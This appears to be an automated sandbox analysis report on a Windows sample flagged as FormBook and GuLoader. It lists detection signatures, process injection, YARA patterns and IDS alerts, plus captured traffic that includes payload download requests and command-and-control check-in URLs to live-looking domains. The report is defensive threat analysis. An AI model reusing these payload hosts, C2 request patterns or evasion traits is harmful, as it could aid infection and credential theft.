Windows Analysis Report
ImBm40hNZ2.exe

Overview

General Information

Sample name: ImBm40hNZ2.exe
Analysis ID: 1529843
MD5: d4c7aab6ed29a31a27712f4536614667
SHA1: ad0bd0a27fa90bbcd0d7fa853fef23f2692bea45
SHA256: bcc652b9e147d7e052c9a239e7e2330c9b3fd04743cb40804ea2616aa4f50f1a

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • ImBm40hNZ2.exe (PID: 6168 cmdline: "C:\Users\user\Desktop\ImBm40hNZ2.exe" MD5: D4C7AAB6ED29A31A27712F4536614667)
    • ImBm40hNZ2.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\ImBm40hNZ2.exe" MD5: D4C7AAB6ED29A31A27712F4536614667)
      • aypAdCUEzlG.exe (PID: 1340 cmdline: "C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 2456 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • aypAdCUEzlG.exe (PID: 900 cmdline: "C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        No Sigma rule has matched
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-09T13:34:55.858437+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49738 | 170.249.236.53 | 443 | TCP
        2024-10-09T13:35:06.975942+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49739 | 199.103.62.205 | 443 | TCP

        AV Detection

        Source: ImBm40hNZ2.exe | ReversingLabs: Detection: 39%
        Source: Yara match | File source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: ImBm40hNZ2.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49738 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49739 version: TLS 1.2
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aypAdCUEzlG.exe, 00000004.00000000.17122430937.000000000032E000.00000002.00000001.01000000.00000008.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21523593349.000000000032E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: cmdkey.pdbGCTL source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ImBm40hNZ2.exe, ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmdkey.pdb source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | Directory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | Code function: 0_2_00402645 FindFirstFileA, 0_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | Code function: 0_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | Code function: 0_2_00405E95 FindFirstFileA,FindClose, 0_2_00405E95
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | Code function: 3_2_00402645 FindFirstFileA, 3_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | Code function: 3_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 3_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | Code function: 3_2_00405E95 FindFirstFileA,FindClose, 3_2_00405E95
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 5_2_0301C710 FindFirstFileW,FindNextFileW,FindClose, 5_2_0301C710
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | File opened: C:\Users\user
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | File opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | File opened: C:\Users\user\AppData\Roaming
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 4x nop then xor eax, eax, 5_2_03009B50
        Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 4x nop then mov ebx, 00000004h, 5_2_036804E8

        Networking

        Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 203.161.46.205:80
        Source: DNS query: www.518729.xyz
        Source: Joe Sandbox View | IP Address: 185.230.15.3
        Source: Joe Sandbox View | IP Address: 176.57.64.102
        Source: Joe Sandbox View | IP Address: 199.103.62.205
        Source: Joe Sandbox View | ASN Name: VIALIS-MOSELLELocatedinMetzFranceFR
        Source: Joe Sandbox View | ASN Name: TELINEABA
        Source: Joe Sandbox View | ASN Name: TAKE2US
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49739 -> 199.103.62.205:443
        Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49738 -> 170.249.236.53:443
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | HTTP traffic detected: GET /sCvgayhFHxN196.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: secretspark.com.bd
            Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /sCvgayhFHxN196.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: www.groupriam.com
            Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /mktg/?9B6h=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&FlS=3ldH5dkH-dBLf HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /enra/?FlS=3ldH5dkH-dBLf&9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf HTTP/1.1Host: www.asa-malukuutara.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /o0e7/?9B6h=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&FlS=3ldH5dkH-dBLf HTTP/1.1Host: www.meetfactory.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /fp5q/?9B6h=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&FlS=3ldH5dkH-dBLf HTTP/1.1Host: www.cachsoicautdtc.bestAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /p1v4/?FlS=3ldH5dkH-dBLf&9B6h=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY= HTTP/1.1Host: www.itemfilterhub.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Connection: close
        expires: Wed, 11 Jan 1984 05:00:00 GMT
        cache-control: no-cache, must-revalidate, max-age=0
        content-type: text/html; charset=UTF-8
        link: <https://secretspark.com.bd/wp-json/>; rel="https://api.w.org/"
        x-litespeed-cache: hit
        transfer-encoding: chunked
        date: Wed, 09 Oct 2024 11:34:55 GMT
        server: LiteSpeed
        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:40 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 
35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:42 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 
68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68519428253vary: Accept-Encodingx-frame-options: DENYx-shopid: 68519428253x-shardid: 156content-language: en-HKx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Laxset-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:49 GMT; SameSite=Laxset-cookie: _shopify_y=6bab0783-0043-4cd0-b2d1-ef924f93f83d; Expires=Thu, 09-Oct-25 11:38:49 GMT; Domain=cannulafactory.top; Path=/; SameSite=Laxset-cookie: _shopify_s=c8048fc5-4b7a-4fe6-a81c-481de043f12a; Expires=Wed, 